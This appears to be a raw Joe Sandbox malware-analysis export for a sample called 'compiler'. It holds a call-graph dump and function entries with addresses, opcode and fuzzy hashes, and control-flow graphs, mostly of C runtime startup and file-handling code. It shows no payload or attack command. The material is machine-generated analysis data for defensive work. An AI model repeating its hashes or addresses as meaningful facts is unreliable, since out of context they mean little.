FindHandler 61489->61535 61495 7ff7bad8c075 61495->61483 61537 7ff7bad8c310 8 API calls 2 library calls 61495->61537 61497 7ff7bad8c08c 61497->61482 61499 7ff7bad8c14e __scrt_initialize_crt 61498->61499 61540 7ff7bad8d770 61499->61540 61505 7ff7bad8bf7c 61505->61474 61505->61475 61507 7ff7badb5277 61506->61507 61508 7ff7bad8bfc3 61507->61508 61591 7ff7bad8be84 61507->61591 61508->61482 61510 7ff7badb5200 61508->61510 61511 7ff7badb524f 61510->61511 61512 7ff7badb5235 61510->61512 61511->61489 61512->61511 61673 7ff7bad8bf4c 61512->61673 61681 7ff7bad8cbb0 61514->61681 61518 7ff7badc4e18 pre_c_initialization 37 API calls 61517->61518 61519 7ff7badb519f 61518->61519 61520 7ff7bad8c05a 61519->61520 61683 7ff7badc5150 26 API calls TranslateName 61519->61683 61522 7ff7bad350e0 61520->61522 61523 7ff7bad350eb 61522->61523 61684 7ff7bad3e350 61523->61684 61526 7ff7bad383c7 61687 7ff7bad3ab80 61526->61687 61527 7ff7bad383b6 61703 7ff7bad38174 60 API calls vwscanf_s 61527->61703 61534 7ff7bad383c2 61536 7ff7bad8c644 GetModuleHandleW 61534->61536 61535->61485 61536->61495 61537->61497 61538->61477 61539->61483 61541 7ff7bad8d779 __vcrt_initialize_winapi_thunks __vcrt_initialize 61540->61541 61555 7ff7bad8d9ec 61541->61555 61544 7ff7bad8c153 61544->61505 61548 7ff7badb6c90 61544->61548 61546 7ff7bad8d790 61546->61544 61562 7ff7bad8da34 DeleteCriticalSection 61546->61562 61549 7ff7badc8d9c 61548->61549 61550 7ff7bad8c160 61549->61550 61551 7ff7badc4d60 37 API calls 61549->61551 61553 7ff7badc4e18 37 API calls 61549->61553 61579 7ff7badb8678 61549->61579 61550->61505 61554 7ff7bad8d7a4 8 API calls 3 library calls 61550->61554 61551->61549 61553->61549 61554->61505 61556 7ff7bad8d9f4 61555->61556 61558 7ff7bad8da25 61556->61558 61559 7ff7bad8d783 61556->61559 61563 7ff7bad8dd70 61556->61563 61568 7ff7bad8da34 DeleteCriticalSection 61558->61568 61559->61544 61561 7ff7bad8d8f4 8 API calls 3 library calls 61559->61561 61561->61546 61562->61544 61569 7ff7bad8da6c 61563->61569 61566 7ff7bad8ddb0 61566->61556 61567 7ff7bad8ddbb InitializeCriticalSectionAndSpinCount 61567->61566 61568->61559 61570 7ff7bad8dacd 61569->61570 61574 7ff7bad8dac8 try_get_function 61569->61574 61570->61566 61570->61567 61571 7ff7bad8dafc LoadLibraryExW 61572 7ff7bad8db1d GetLastError 61571->61572 61571->61574 61572->61574 61573 7ff7bad8dbbe GetProcAddress 61576 7ff7bad8dbcf 61573->61576 61574->61570 61574->61571 61575 7ff7bad8dbb0 61574->61575 61577 7ff7bad8db95 FreeLibrary 61574->61577 61578 7ff7bad8db57 LoadLibraryExW 61574->61578 61575->61570 61575->61573 61576->61570 61577->61574 61578->61574 61590 7ff7badb75c8 EnterCriticalSection 61579->61590 61581 7ff7badb8688 61582 7ff7badc57e8 24 API calls 61581->61582 61583 7ff7badb8691 61582->61583 61584 7ff7badb847c 26 API calls 61583->61584 61589 7ff7badb869f 61583->61589 61586 7ff7badb869a 61584->61586 61585 7ff7badb761c _isindst LeaveCriticalSection 61587 7ff7badb86ab 61585->61587 61588 7ff7badb856c GetStdHandle GetFileType 61586->61588 61587->61549 61588->61589 61589->61585 61592 7ff7bad8be94 pre_c_initialization 61591->61592 61608 7ff7badb52d4 61592->61608 61594 7ff7bad8bea0 pre_c_initialization 61614 7ff7bad8c178 61594->61614 61596 7ff7bad8beb9 _RTC_Initialize 61606 7ff7bad8bf0e pre_c_initialization 61596->61606 61619 7ff7bad8c38c 61596->61619 61598 7ff7bad8bf3a __scrt_initialize_default_local_stdio_options 61598->61507 61600 7ff7bad8bece pre_c_initialization 61622 7ff7badb4cc8 61600->61622 61604 7ff7bad8bee3 pre_c_initialization 61605 7ff7badb593c pre_c_initialization 26 API calls 61604->61605 61605->61606 61607 7ff7bad8bf2a 61606->61607 61655 7ff7bad8c4b4 7 API calls __scrt_fastfail 61606->61655 61607->61507 61609 7ff7badb52e5 61608->61609 61610 7ff7bada9b44 _get_daylight 14 API calls 61609->61610 61611 7ff7badb52ed 61609->61611 61612 7ff7badb52fc 61610->61612 61611->61594 61656 7ff7badb7070 23 API calls _invalid_parameter_noinfo 61612->61656 61615 7ff7bad8c18d 61614->61615 61618 7ff7bad8c196 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 61614->61618 61615->61618 61657 7ff7bad8c4b4 7 API calls __scrt_fastfail 61615->61657 61617 7ff7bad8c24f 61618->61596 61658 7ff7bad8c33c 61619->61658 61621 7ff7bad8c395 61621->61600 61623 7ff7badb4ce8 61622->61623 61624 7ff7bad8beda 61622->61624 61625 7ff7badb4cf0 61623->61625 61626 7ff7badb4d06 61623->61626 61624->61606 61654 7ff7bad8c460 InitializeSListHead 61624->61654 61627 7ff7bada9b44 _get_daylight 14 API calls 61625->61627 61628 7ff7badc4e18 pre_c_initialization 37 API calls 61626->61628 61629 7ff7badb4cf5 61627->61629 61630 7ff7badb4d0b 61628->61630 61663 7ff7badb7070 23 API calls _invalid_parameter_noinfo 61629->61663 61664 7ff7badc45cc 30 API calls 4 library calls 61630->61664 61633 7ff7badb4d22 61665 7ff7badb4aa4 26 API calls pre_c_initialization 61633->61665 61635 7ff7badb4d5f 61666 7ff7badb4c68 14 API calls 2 library calls 61635->61666 61637 7ff7badb4d75 61638 7ff7badb4d95 61637->61638 61639 7ff7badb4d7d 61637->61639 61668 7ff7badb4aa4 26 API calls pre_c_initialization 61638->61668 61640 7ff7bada9b44 _get_daylight 14 API calls 61639->61640 61642 7ff7badb4d82 61640->61642 61667 7ff7badb76b0 14 API calls 2 library calls 61642->61667 61644 7ff7badb4d90 61644->61624 61646 7ff7badb4db1 61647 7ff7badb4de3 61646->61647 61648 7ff7badb4dfc 61646->61648 61653 7ff7badb4db7 61646->61653 61669 7ff7badb76b0 14 API calls 2 library calls 61647->61669 61671 7ff7badb76b0 14 API calls 2 library calls 61648->61671 61650 7ff7badb4dec 61670 7ff7badb76b0 14 API calls 2 library calls 61650->61670 61672 7ff7badb76b0 14 API calls 2 library calls 61653->61672 61655->61598 61656->61611 61657->61617 61659 7ff7bad8c36b 61658->61659 61661 7ff7bad8c361 _onexit 61658->61661 61662 7ff7badb6b1c 26 API calls _onexit 61659->61662 61661->61621 61662->61661 61663->61624 61664->61633 61665->61635 61666->61637 61667->61644 61668->61646 61669->61650 61670->61644 61671->61653 61672->61624 61680 7ff7bad8c698 SetUnhandledExceptionFilter 61673->61680 61682 7ff7bad8c617 GetStartupInfoW 61681->61682 61682->61487 61683->61519 61704 7ff7bad39e4c 61684->61704 61686 7ff7bad383ae 61686->61526 61686->61527 61688 7ff7bad33037 89 API calls 61687->61688 61689 7ff7bad383e6 61688->61689 61690 7ff7bad38aac 61689->61690 61691 7ff7bad383f2 61690->61691 61692 7ff7bad38abf 61690->61692 61698 7ff7bad39d88 61691->61698 61692->61691 61735 7ff7bad3beb4 16 API calls 61692->61735 61694 7ff7bad38ad9 61736 7ff7bad38174 60 API calls vwscanf_s 61694->61736 61696 7ff7bad38aec 61737 7ff7bad3bd34 16 API calls 61696->61737 61738 7ff7bad49f50 77 API calls 61698->61738 61700 7ff7bad33037 89 API calls 61701 7ff7bad39daa _cwprintf_s_l 61700->61701 61701->61700 61702 7ff7bad39e34 61701->61702 61703->61534 61713 7ff7bad46870 61704->61713 61706 7ff7bad39e7b 61708 7ff7bad39fdb __FrameHandler3::UnwindNestedFrames 61706->61708 61709 7ff7bad39e9d __scrt_fastfail 61706->61709 61717 7ff7bad486f4 61706->61717 61708->61686 61709->61708 61710 7ff7bad33037 89 API calls 61709->61710 61711 7ff7bad39fcf 61710->61711 61711->61708 61720 7ff7bad39a2c 61711->61720 61714 7ff7bad46885 LoadLibraryExA 61713->61714 61716 7ff7bad468bc _cwprintf_s_l 61713->61716 61715 7ff7bad468a0 GetProcAddressForCaller 61714->61715 61714->61716 61715->61716 61716->61706 61728 7ff7bad490f0 GetLastError VirtualAlloc SetLastError 61717->61728 61719 7ff7bad4870d __scrt_fastfail 61719->61709 61721 7ff7bad39a46 _cwprintf_s_l 61720->61721 61729 7ff7bad456b0 61721->61729 61723 7ff7bad39a56 61724 7ff7bad445b8 VirtualFree 61723->61724 61725 7ff7bad39a5e 61724->61725 61726 7ff7bad39b0c 61725->61726 61727 7ff7bad487f8 GetLastError VirtualQuery VirtualFree SetLastError 61725->61727 61726->61708 61727->61726 61728->61719 61732 7ff7bad61074 61729->61732 61733 7ff7bad61096 VirtualFree 61732->61733 61734 7ff7bad456cc 61732->61734 61733->61733 61733->61734 61735->61694 61736->61696 61737->61691 61738->61701 61739 7ff7bad42060 61742 7ff7bad42778 61739->61742 61741 7ff7bad42078 61741->61741 61743 7ff7bad427a1 61742->61743 61744 7ff7bad427e3 61742->61744 61745 7ff7bad41000 16 API calls 61743->61745 61746 7ff7bad41000 16 API calls 61744->61746 61747 7ff7bad427ae 61745->61747 61748 7ff7bad427ed 61746->61748 61749 7ff7bad4289d 61747->61749 61750 7ff7bad4286e 61747->61750 61751 7ff7bad4284c 61747->61751 61748->61747 61748->61749 61753 7ff7bad41064 _cwprintf_s_l 16 API calls 61748->61753 61756 7ff7bad3c940 16 API calls _cwprintf_s_l 61749->61756 61750->61741 61754 7ff7bad41064 _cwprintf_s_l 16 API calls 61751->61754 61753->61747 61754->61750 61757 7ff7bad31d44 61759 7ff7bad31d62 61757->61759 61760 7ff7bad42008 61759->61760 61761 7ff7bad42778 16 API calls 61760->61761 61762 7ff7bad42013 61761->61762 61762->61759 61762->61762 61763 7ff7bada98ac 61764 7ff7bada9913 61763->61764 61765 7ff7bada98c9 GetModuleHandleW 61763->61765 61773 7ff7bada97a4 61764->61773 61765->61764 61769 7ff7bada98d6 61765->61769 61768 7ff7bada9955 61769->61764 61787 7ff7bada99b4 GetModuleHandleExW 61769->61787 61771 7ff7bada9967 61793 7ff7badb75c8 EnterCriticalSection 61773->61793 61775 7ff7bada97c0 61776 7ff7bada97dc 24 API calls 61775->61776 61777 7ff7bada97c9 61776->61777 61778 7ff7badb761c _isindst LeaveCriticalSection 61777->61778 61779 7ff7bada97d1 61778->61779 61779->61768 61780 7ff7bada9968 61779->61780 61794 7ff7badbba6c 61780->61794 61783 7ff7bada99a2 61785 7ff7bada99b4 3 API calls 61783->61785 61784 7ff7bada9991 GetCurrentProcess TerminateProcess 61784->61783 61786 7ff7bada99a9 ExitProcess 61785->61786 61788 7ff7bada99f9 61787->61788 61789 7ff7bada99da GetProcAddress 61787->61789 61791 7ff7bada9a03 FreeLibrary 61788->61791 61792 7ff7bada9a09 61788->61792 61789->61788 61790 7ff7bada99f1 61789->61790 61790->61788 61791->61792 61792->61764 61795 7ff7badbba8a 61794->61795 61796 7ff7bada9975 61794->61796 61798 7ff7badb796c 61795->61798 61796->61783 61796->61784 61799 7ff7badb7794 try_get_function 5 API calls 61798->61799 61800 7ff7badb7994 61799->61800 61800->61796

                                                            Executed Functions

                                                            Function 00007FF7BAD8BF4C Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 59578552-0
                                                            • Opcode ID: c929f4e4c52116a57e7616fe210febb9697bb72e3a0dbf161af8a0ea1499aaf3
                                                            • Instruction ID: 3def1bd9c2d39b7a1ebf25ae5019e742d923dc652e10af420863253fcdd9fe14
                                                            • Opcode Fuzzy Hash: c929f4e4c52116a57e7616fe210febb9697bb72e3a0dbf161af8a0ea1499aaf3
                                                            • Instruction Fuzzy Hash: 43E0BF21E1D20292FA18777D48421BC9091DF76310FE002B5EB1D456CECD3D64525631
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD8BF68 Relevance: 15.1, APIs: 10, Instructions: 94COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: __scrt_fastfail__scrt_is_nonwritable_in_current_image$__scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                            • String ID:
                                                            • API String ID: 1664584033-0
                                                            • Opcode ID: 03eb6b14f1faf7f4670637568bd0667e55731e7767f39476883028e821a64beb
                                                            • Instruction ID: dd5fd1664ec37ecc7eebc11e5d6aa608a9bcf4928569b9318a5e746ee9e0be1b
                                                            • Opcode Fuzzy Hash: 03eb6b14f1faf7f4670637568bd0667e55731e7767f39476883028e821a64beb
                                                            • Instruction Fuzzy Hash: F0313D10E0C20785FA14BB6C945A3BAA280EF73784FC454B5EF0E4B2DFDE2DB5458261
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC0470 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 59 7ff7badc0470-7ff7badc04e3 call 7ff7badc0054 62 7ff7badc04e5-7ff7badc04ee call 7ff7bada9b24 59->62 63 7ff7badc04fd-7ff7badc0507 call 7ff7badc59a0 59->63 68 7ff7badc04f1-7ff7badc04f8 call 7ff7bada9b44 62->68 69 7ff7badc0522-7ff7badc058b CreateFileW 63->69 70 7ff7badc0509-7ff7badc0520 call 7ff7bada9b24 call 7ff7bada9b44 63->70 83 7ff7badc0836-7ff7badc0856 68->83 71 7ff7badc0608-7ff7badc0613 GetFileType 69->71 72 7ff7badc058d-7ff7badc0593 69->72 70->68 78 7ff7badc0666-7ff7badc066d 71->78 79 7ff7badc0615-7ff7badc0650 GetLastError call 7ff7bada9ad4 CloseHandle 71->79 75 7ff7badc05d5-7ff7badc0603 GetLastError call 7ff7bada9ad4 72->75 76 7ff7badc0595-7ff7badc0599 72->76 75->68 76->75 81 7ff7badc059b-7ff7badc05d3 CreateFileW 76->81 86 7ff7badc066f-7ff7badc0673 78->86 87 7ff7badc0675-7ff7badc0678 78->87 79->68 94 7ff7badc0656-7ff7badc0661 call 7ff7bada9b44 79->94 81->71 81->75 88 7ff7badc067e-7ff7badc06cf call 7ff7badc58b8 86->88 87->88 89 7ff7badc067a 87->89 97 7ff7badc06d1-7ff7badc06dd call 7ff7badc0260 88->97 98 7ff7badc06ee-7ff7badc071e call 7ff7badbfdc0 88->98 89->88 94->68 97->98 104 7ff7badc06df 97->104 105 7ff7badc06e1-7ff7badc06e9 call 7ff7badbbbc0 98->105 106 7ff7badc0720-7ff7badc0763 98->106 104->105 105->83 107 7ff7badc0785-7ff7badc0790 106->107 108 7ff7badc0765-7ff7badc0769 106->108 111 7ff7badc0796-7ff7badc079a 107->111 112 7ff7badc0834 107->112 108->107 110 7ff7badc076b-7ff7badc0780 108->110 110->107 111->112 114 7ff7badc07a0-7ff7badc07e5 CloseHandle CreateFileW 111->114 112->83 115 7ff7badc081a-7ff7badc082f 114->115 116 7ff7badc07e7-7ff7badc0815 GetLastError call 7ff7bada9ad4 call 7ff7badc5ae0 114->116 115->112 116->115
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                            • String ID:
                                                            • API String ID: 1330151763-0
                                                            • Opcode ID: 5d9e04e0c033c60789675486a423cd353925c34ff20c017513265b0d4d37ee32
                                                            • Instruction ID: ae3e188066dfd0adcef4431c5fdc4bbef287b97bc2371ae4f55847ef449ca578
                                                            • Opcode Fuzzy Hash: 5d9e04e0c033c60789675486a423cd353925c34ff20c017513265b0d4d37ee32
                                                            • Instruction Fuzzy Hash: FDC1BE32B24A4196FB10EF68C4906AD7761FB9AB98B804679DF2E4779CDF38D051C350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBC830 Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 121 7ff7badbc830-7ff7badbc856 122 7ff7badbc871-7ff7badbc875 121->122 123 7ff7badbc858-7ff7badbc86c call 7ff7bada9b24 call 7ff7bada9b44 121->123 125 7ff7badbcc54-7ff7badbcc60 call 7ff7bada9b24 call 7ff7bada9b44 122->125 126 7ff7badbc87b-7ff7badbc882 122->126 141 7ff7badbcc6b 123->141 143 7ff7badbcc66 call 7ff7badb7070 125->143 126->125 129 7ff7badbc888-7ff7badbc8ba 126->129 129->125 130 7ff7badbc8c0-7ff7badbc8c7 129->130 133 7ff7badbc8e0-7ff7badbc8e3 130->133 134 7ff7badbc8c9-7ff7badbc8db call 7ff7bada9b24 call 7ff7bada9b44 130->134 139 7ff7badbcc50-7ff7badbcc52 133->139 140 7ff7badbc8e9-7ff7badbc8eb 133->140 134->143 144 7ff7badbcc6e-7ff7badbcc85 139->144 140->139 145 7ff7badbc8f1-7ff7badbc8f4 140->145 141->144 143->141 145->134 148 7ff7badbc8f6-7ff7badbc91c 145->148 150 7ff7badbc91e-7ff7badbc921 148->150 151 7ff7badbc95b-7ff7badbc963 148->151 154 7ff7badbc923-7ff7badbc92b 150->154 155 7ff7badbc949-7ff7badbc956 150->155 152 7ff7badbc965-7ff7badbc98d call 7ff7badb89e8 call 7ff7badb76b0 * 2 151->152 153 7ff7badbc92d-7ff7badbc944 call 7ff7bada9b24 call 7ff7bada9b44 call 7ff7badb7070 151->153 184 7ff7badbc98f-7ff7badbc9a5 call 7ff7bada9b44 call 7ff7bada9b24 152->184 185 7ff7badbc9aa-7ff7badbc9db call 7ff7badbed80 152->185 182 7ff7badbcae4 153->182 154->153 154->155 156 7ff7badbc9df-7ff7badbc9f2 155->156 159 7ff7badbc9f4-7ff7badbc9fc 156->159 160 7ff7badbca6e-7ff7badbca78 call 7ff7bada9194 156->160 159->160 163 7ff7badbc9fe-7ff7badbca00 159->163 171 7ff7badbcb02 160->171 172 7ff7badbca7e-7ff7badbca93 160->172 163->160 169 7ff7badbca02-7ff7badbca19 163->169 169->160 174 7ff7badbca1b-7ff7badbca27 169->174 180 7ff7badbcb07-7ff7badbcb27 ReadFile 171->180 172->171 176 7ff7badbca95-7ff7badbcaa7 GetConsoleMode 172->176 174->160 178 7ff7badbca29-7ff7badbca2b 174->178 176->171 181 7ff7badbcaa9-7ff7badbcab1 176->181 178->160 183 7ff7badbca2d-7ff7badbca45 178->183 186 7ff7badbcc1a-7ff7badbcc23 GetLastError 180->186 187 7ff7badbcb2d-7ff7badbcb35 180->187 181->180 190 7ff7badbcab3-7ff7badbcad5 ReadConsoleW 181->190 193 7ff7badbcae7-7ff7badbcaf1 call 7ff7badb76b0 182->193 183->160 194 7ff7badbca47-7ff7badbca53 183->194 184->182 185->156 191 7ff7badbcc40-7ff7badbcc43 186->191 192 7ff7badbcc25-7ff7badbcc3b call 7ff7bada9b44 call 7ff7bada9b24 186->192 187->186 188 7ff7badbcb3b 187->188 196 7ff7badbcb42-7ff7badbcb57 188->196 198 7ff7badbcaf6-7ff7badbcb00 190->198 199 7ff7badbcad7 GetLastError 190->199 203 7ff7badbcc49-7ff7badbcc4b 191->203 204 7ff7badbcadd-7ff7badbcadf call 7ff7bada9ad4 191->204 192->182 193->144 194->160 202 7ff7badbca55-7ff7badbca57 194->202 196->193 206 7ff7badbcb59-7ff7badbcb64 196->206 198->196 199->204 202->160 210 7ff7badbca59-7ff7badbca69 202->210 203->193 204->182 213 7ff7badbcb66-7ff7badbcb7f call 7ff7badbc578 206->213 214 7ff7badbcb8b-7ff7badbcb93 206->214 210->160 221 7ff7badbcb84-7ff7badbcb86 213->221 217 7ff7badbcb95-7ff7badbcba7 214->217 218 7ff7badbcc08-7ff7badbcc15 call 7ff7badbc30c 214->218 222 7ff7badbcba9 217->222 223 7ff7badbcbfb-7ff7badbcc03 217->223 218->221 221->193 225 7ff7badbcbae-7ff7badbcbb5 222->225 223->193 226 7ff7badbcbf1-7ff7badbcbf5 225->226 227 7ff7badbcbb7-7ff7badbcbbb 225->227 226->223 228 7ff7badbcbd7 227->228 229 7ff7badbcbbd-7ff7badbcbc4 227->229 231 7ff7badbcbdd-7ff7badbcbed 228->231 229->228 230 7ff7badbcbc6-7ff7badbcbca 229->230 230->228 233 7ff7badbcbcc-7ff7badbcbd5 230->233 231->225 232 7ff7badbcbef 231->232 232->223 233->231
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: ac296493bf1d68606dd17f0184959cac14ad6e10368896e64cc43297ccf6545d
                                                            • Instruction ID: 7b5942cf8aa4a2d4f84cc137e87447dbf88eae99e6b711d0dcb3d114e53d26c5
                                                            • Opcode Fuzzy Hash: ac296493bf1d68606dd17f0184959cac14ad6e10368896e64cc43297ccf6545d
                                                            • Instruction Fuzzy Hash: F2C1C122A08786A1FB61BB1D90442BDE6A1FBA6B80FC50171EF4E0379DDE7CE455C360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD5AF30 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 362COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 368 7ff7bad5af30-7ff7bad5af8b call 7ff7bad5c618 371 7ff7bad5af8d-7ff7bad5afa5 368->371 372 7ff7bad5afa7-7ff7bad5afc5 call 7ff7bad447bc 368->372 371->371 371->372 375 7ff7bad5afec 372->375 376 7ff7bad5afc7-7ff7bad5afea call 7ff7bad5c714 call 7ff7bad44ef0 372->376 377 7ff7bad5aff0-7ff7bad5aff3 375->377 376->377 379 7ff7bad5b129-7ff7bad5b181 call 7ff7bad3c5ac call 7ff7bad5c5d0 377->379 380 7ff7bad5aff9-7ff7bad5b055 call 7ff7bad5d31c call 7ff7bad73d40 377->380 392 7ff7bad5b18d-7ff7bad5b193 call 7ff7bad7b0e4 379->392 393 7ff7bad5b183-7ff7bad5b18b 379->393 394 7ff7bad5b05b-7ff7bad5b06b call 7ff7bad41dfc 380->394 395 7ff7bad5b0f3-7ff7bad5b103 380->395 401 7ff7bad5b198-7ff7bad5b19a 392->401 396 7ff7bad5b19c-7ff7bad5b1b5 393->396 394->395 408 7ff7bad5b071-7ff7bad5b07e 394->408 398 7ff7bad5b10d-7ff7bad5b128 395->398 399 7ff7bad5b105-7ff7bad5b108 call 7ff7bad40e08 395->399 402 7ff7bad5b1c2-7ff7bad5b1ca 396->402 399->398 401->396 405 7ff7bad5b205-7ff7bad5b21f 401->405 406 7ff7bad5b1cc-7ff7bad5b1ef call 7ff7bad44ad8 402->406 407 7ff7bad5b1b7-7ff7bad5b1be 402->407 413 7ff7bad5b1fb-7ff7bad5b1fe 406->413 414 7ff7bad5b1f1-7ff7bad5b1f9 call 7ff7bad43b14 406->414 407->402 408->395 410 7ff7bad5b080-7ff7bad5b08d 408->410 410->395 412 7ff7bad5b08f-7ff7bad5b093 410->412 412->395 415 7ff7bad5b095-7ff7bad5b0b0 call 7ff7bad430a8 412->415 418 7ff7bad5b220-7ff7bad5b276 call 7ff7bad44c60 call 7ff7bad3c798 call 7ff7bad5c5d0 413->418 419 7ff7bad5b200 call 7ff7bad5af30 413->419 414->405 415->395 424 7ff7bad5b0b2-7ff7bad5b0bb 415->424 435 7ff7bad5b278-7ff7bad5b27b 418->435 436 7ff7bad5b2d5-7ff7bad5b2fb 418->436 419->405 424->395 426 7ff7bad5b0bd-7ff7bad5b0d7 call 7ff7bad42574 424->426 432 7ff7bad5b0ee 426->432 433 7ff7bad5b0d9-7ff7bad5b0ea 426->433 432->395 433->432 438 7ff7bad5b282-7ff7bad5b29c call 7ff7bad44c60 call 7ff7bad4b614 435->438 437 7ff7bad5b308-7ff7bad5b312 436->437 439 7ff7bad5b2fd-7ff7bad5b304 437->439 440 7ff7bad5b314-7ff7bad5b320 437->440 452 7ff7bad5b2a1-7ff7bad5b2ad 438->452 439->437 442 7ff7bad5b33c-7ff7bad5b34c 440->442 443 7ff7bad5b322 440->443 446 7ff7bad5b34e-7ff7bad5b354 call 7ff7bad44d28 442->446 447 7ff7bad5b376-7ff7bad5b37a 442->447 445 7ff7bad5b325-7ff7bad5b33a 443->445 445->442 445->445 455 7ff7bad5b359-7ff7bad5b371 446->455 450 7ff7bad5b37c-7ff7bad5b382 447->450 451 7ff7bad5b39a-7ff7bad5b3a2 447->451 450->451 456 7ff7bad5b384-7ff7bad5b398 call 7ff7bad44dfc 450->456 453 7ff7bad5b3a4-7ff7bad5b3a7 451->453 454 7ff7bad5b3b0-7ff7bad5b3b3 451->454 457 7ff7bad5b2b7 452->457 458 7ff7bad5b2af-7ff7bad5b2b2 call 7ff7bad40e08 452->458 462 7ff7bad5b3b8-7ff7bad5b3bb 453->462 463 7ff7bad5b3a9 453->463 455->452 456->455 461 7ff7bad5b2bc-7ff7bad5b2d4 457->461 458->457 465 7ff7bad5b3bd-7ff7bad5b3c1 462->465 466 7ff7bad5b3e1-7ff7bad5b3eb 462->466 463->454 467 7ff7bad5b3c7 465->467 468 7ff7bad5b3c3-7ff7bad5b3c5 465->468 469 7ff7bad5b3ed-7ff7bad5b3f9 466->469 470 7ff7bad5b3ff-7ff7bad5b42e call 7ff7bad44ad8 466->470 471 7ff7bad5b3ca-7ff7bad5b3df 467->471 468->471 469->438 469->470 470->438 474 7ff7bad5b434-7ff7bad5b43f call 7ff7bad43b14 470->474 471->466 471->471 474->461
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
